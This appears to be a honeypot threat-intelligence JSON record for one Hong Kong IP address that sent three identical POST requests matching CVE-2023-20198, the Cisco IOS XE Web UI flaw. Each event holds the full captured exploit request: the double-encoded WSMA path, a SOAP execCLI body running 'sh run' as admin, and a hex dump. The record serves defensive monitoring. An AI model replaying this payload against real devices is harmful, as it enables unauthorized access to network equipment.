{"ip":"172.110.223.173","total_events":3,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"CDN","why":["3 event(s), fewer than 10 distinct ports, no exploit payloads.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"2,905 bytes sent","bytes_sent":2905,"session_seconds":0,"persistent":false}},"first_seen":"2026-09-03T19:44:17","last_seen":"2026-09-03T23:23:38","events_24h":0,"events_7d":0,"geo":{"country_code":"HK","country_name":"Hong Kong","region":"","city":"","lat":22.2578,"lon":114.1657,"asn":23470,"org":"ReliableSite.Net LLC"},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as23470","label":"ReliableSite.Net","category":"cdn","url":"https://www.peeringdb.com/asn/23470"},"cve_matches":[{"cve_id":"CVE-2023-20198","title":"Cisco IOS XE Web UI - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/%2577eb%2575i_%2577sma_Http"}],"malware":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":3}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_client_hello":"","tls_ja3":[],"http_akin":["b11cuq070_00050817_c5c151c1"]},"fingerprint_peers":{"b11cuq070_00050817_c5c151c1":2},"akin_families":{},"user_agents":["CVE-2023-20198"],"timeline":[{"date":"2026-09-03","count":3}],"recent_events":[{"timestamp":"2026-09-03T23:23:38","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"735\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>\",\"user-agent\":\"CVE-2023-20198\"}","body":"<?xml version=\"1.0\"?>\n<SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n<SOAP:Header>\n<wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\">\n<wsse:UsernameToken SOAP:mustUnderstand=\"false\">\n<wsse:Username>admin</wsse:Username>\n<wsse:Password>*****</wsse:Password>\n</wsse:UsernameToken>\n</wsse:Security>\n</SOAP:Header>\n<SOAP:Body>\n<request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\">\n<execCLI xsd=\"false\">\n<cmd>sh run</cmd>\n<dialogue>\n<expect>\n</expect>\n<reply>\n</reply>\n</dialogue>\n</execCLI>\n</request>\n</SOAP:Body>\n</SOAP:Envelope>","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/%2577eb%2575i_%2577sma_Http","summary":"","payload_hex":"504f5354202f253235373765622532353735695f2532353737736d615f4874747020485454502f312e310d0a486f73743a20<HONEYPOT>0d0a557365722d4167656e743a204356452d323032332d32303139380d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a636f6e74656e742d747970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203733350d0a0d0a3c3f786d6c2076657273696f6e3d22312e30223f3e0a3c534f41503a456e76656c6f706520786d6c6e733a534f41503d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a534f41502d454e433d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f2220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e6365223e0a3c534f41503a4865616465723e0a3c777373653a536563757269747920786d6c6e733a777373653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f77732f323030322f30342f736563657874223e0a3c777373653a557365726e616d65546f6b656e20534f41503a6d757374556e6465727374616e643d2266616c7365223e0a3c777373653a557365726e616d653e61646d696e3c2f777373653a557365726e616d653e0a3c777373653a50617373776f72643e2a2a2a2a2a3c2f777373653a50617373776f72643e0a3c2f777373653a557365726e616d65546f6b656e3e0a3c2f777373653a53656375726974793e0a3c2f534f41503a4865616465723e0a3c534f41503a426f64793e0a3c7265717565737420636f7272656c61746f723d2265786563312220786d6c6e733d2275726e3a636973636f3a77736d612d65786563223e0a3c65786563434c49207873643d2266616c7365223e0a3c636d643e73682072756e3c2f636d643e0a3c6469616c6f6775653e0a3c6578706563743e0a3c2f6578706563743e0a3c7265706c793e0a3c2f7265706c793e0a3c2f6469616c6f6775653e0a3c2f65786563434c493e0a3c2f726571756573743e0a3c2f534f41503a426f64793e0a3c2f534f41503a456e76656c6f70653e","method":"POST","user_agent":"CVE-2023-20198","ja3":"","session":"9f467f93-1820-453b-ab74-7bb53ef39170","seq":1,"duration_ms":101,"bytes_in":968,"bytes_out":80},{"timestamp":"2026-09-03T23:23:37","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"735\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>\",\"user-agent\":\"CVE-2023-20198\"}","body":"<?xml version=\"1.0\"?>\n<SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n<SOAP:Header>\n<wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\">\n<wsse:UsernameToken SOAP:mustUnderstand=\"false\">\n<wsse:Username>admin</wsse:Username>\n<wsse:Password>*****</wsse:Password>\n</wsse:UsernameToken>\n</wsse:Security>\n</SOAP:Header>\n<SOAP:Body>\n<request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\">\n<execCLI xsd=\"false\">\n<cmd>sh run</cmd>\n<dialogue>\n<expect>\n</expect>\n<reply>\n</reply>\n</dialogue>\n</execCLI>\n</request>\n</SOAP:Body>\n</SOAP:Envelope>","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/%2577eb%2575i_%2577sma_Http","summary":"","payload_hex":"504f5354202f253235373765622532353735695f2532353737736d615f4874747020485454502f312e310d0a486f73743a20<HONEYPOT>0d0a557365722d4167656e743a204356452d323032332d32303139380d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a636f6e74656e742d747970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203733350d0a0d0a3c3f786d6c2076657273696f6e3d22312e30223f3e0a3c534f41503a456e76656c6f706520786d6c6e733a534f41503d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a534f41502d454e433d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f2220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e6365223e0a3c534f41503a4865616465723e0a3c777373653a536563757269747920786d6c6e733a777373653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f77732f323030322f30342f736563657874223e0a3c777373653a557365726e616d65546f6b656e20534f41503a6d757374556e6465727374616e643d2266616c7365223e0a3c777373653a557365726e616d653e61646d696e3c2f777373653a557365726e616d653e0a3c777373653a50617373776f72643e2a2a2a2a2a3c2f777373653a50617373776f72643e0a3c2f777373653a557365726e616d65546f6b656e3e0a3c2f777373653a53656375726974793e0a3c2f534f41503a4865616465723e0a3c534f41503a426f64793e0a3c7265717565737420636f7272656c61746f723d2265786563312220786d6c6e733d2275726e3a636973636f3a77736d612d65786563223e0a3c65786563434c49207873643d2266616c7365223e0a3c636d643e73682072756e3c2f636d643e0a3c6469616c6f6775653e0a3c6578706563743e0a3c2f6578706563743e0a3c7265706c793e0a3c2f7265706c793e0a3c2f6469616c6f6775653e0a3c2f65786563434c493e0a3c2f726571756573743e0a3c2f534f41503a426f64793e0a3c2f534f41503a456e76656c6f70653e","method":"POST","user_agent":"CVE-2023-20198","ja3":"","session":"1ecb59ab-d8cf-4f08-8d0d-f86c7ae58053","seq":1,"duration_ms":101,"bytes_in":968,"bytes_out":80},{"timestamp":"2026-09-03T19:44:17","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"735\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>\",\"user-agent\":\"CVE-2023-20198\"}","body":"<?xml version=\"1.0\"?>\n<SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\n<SOAP:Header>\n<wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\">\n<wsse:UsernameToken SOAP:mustUnderstand=\"false\">\n<wsse:Username>admin</wsse:Username>\n<wsse:Password>*****</wsse:Password>\n</wsse:UsernameToken>\n</wsse:Security>\n</SOAP:Header>\n<SOAP:Body>\n<request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\">\n<execCLI xsd=\"false\">\n<cmd>sh run</cmd>\n<dialogue>\n<expect>\n</expect>\n<reply>\n</reply>\n</dialogue>\n</execCLI>\n</request>\n</SOAP:Body>\n</SOAP:Envelope>","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/%2577eb%2575i_%2577sma_Http","summary":"","payload_hex":"504f5354202f253235373765622532353735695f2532353737736d615f4874747020485454502f312e310d0a486f73743a20<HONEYPOT>0d0a557365722d4167656e743a204356452d323032332d32303139380d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a636f6e74656e742d747970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a203733350d0a0d0a3c3f786d6c2076657273696f6e3d22312e30223f3e0a3c534f41503a456e76656c6f706520786d6c6e733a534f41503d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a534f41502d454e433d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e636f64696e672f2220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e6365223e0a3c534f41503a4865616465723e0a3c777373653a536563757269747920786d6c6e733a777373653d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f77732f323030322f30342f736563657874223e0a3c777373653a557365726e616d65546f6b656e20534f41503a6d757374556e6465727374616e643d2266616c7365223e0a3c777373653a557365726e616d653e61646d696e3c2f777373653a557365726e616d653e0a3c777373653a50617373776f72643e2a2a2a2a2a3c2f777373653a50617373776f72643e0a3c2f777373653a557365726e616d65546f6b656e3e0a3c2f777373653a53656375726974793e0a3c2f534f41503a4865616465723e0a3c534f41503a426f64793e0a3c7265717565737420636f7272656c61746f723d2265786563312220786d6c6e733d2275726e3a636973636f3a77736d612d65786563223e0a3c65786563434c49207873643d2266616c7365223e0a3c636d643e73682072756e3c2f636d643e0a3c6469616c6f6775653e0a3c6578706563743e0a3c2f6578706563743e0a3c7265706c793e0a3c2f7265706c793e0a3c2f6469616c6f6775653e0a3c2f65786563434c493e0a3c2f726571756573743e0a3c2f534f41503a426f64793e0a3c2f534f41503a456e76656c6f70653e","method":"POST","user_agent":"CVE-2023-20198","ja3":"","session":"b6f46ae5-e805-4b56-aa32-8127a39bd9bf","seq":1,"duration_ms":100,"bytes_in":969,"bytes_out":80}],"http_methods":[{"method":"POST","count":3}],"distinct_ports_total":1,"top_paths":[{"path":"/%2577eb%2575i_%2577sma_Http","count":3,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Content-Type","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"735","notable":false},{"name":"Content-Type","value":"application/x-www-form-urlencoded","notable":true},{"name":"Host","value":"<HONEYPOT>","notable":false},{"name":"User-Agent","value":"CVE-2023-20198","notable":false}],"distinct_sets":1,"events_with_headers":3},"tags":[{"tag_id":"CVE-2023-20198","tag_type":"cve","title":"Cisco IOS XE Web UI - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/%2577eb%2575i_%2577sma_Http","reference_urls":["https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z","https://www.rapid7.com/blog/post/2023/10/16/etr-cisco-ios-xe-web-ui-cve-2023-20198-active-exploitation/"]}],"data_as_of":"2026-09-30T19:00:08.049768+00:00"}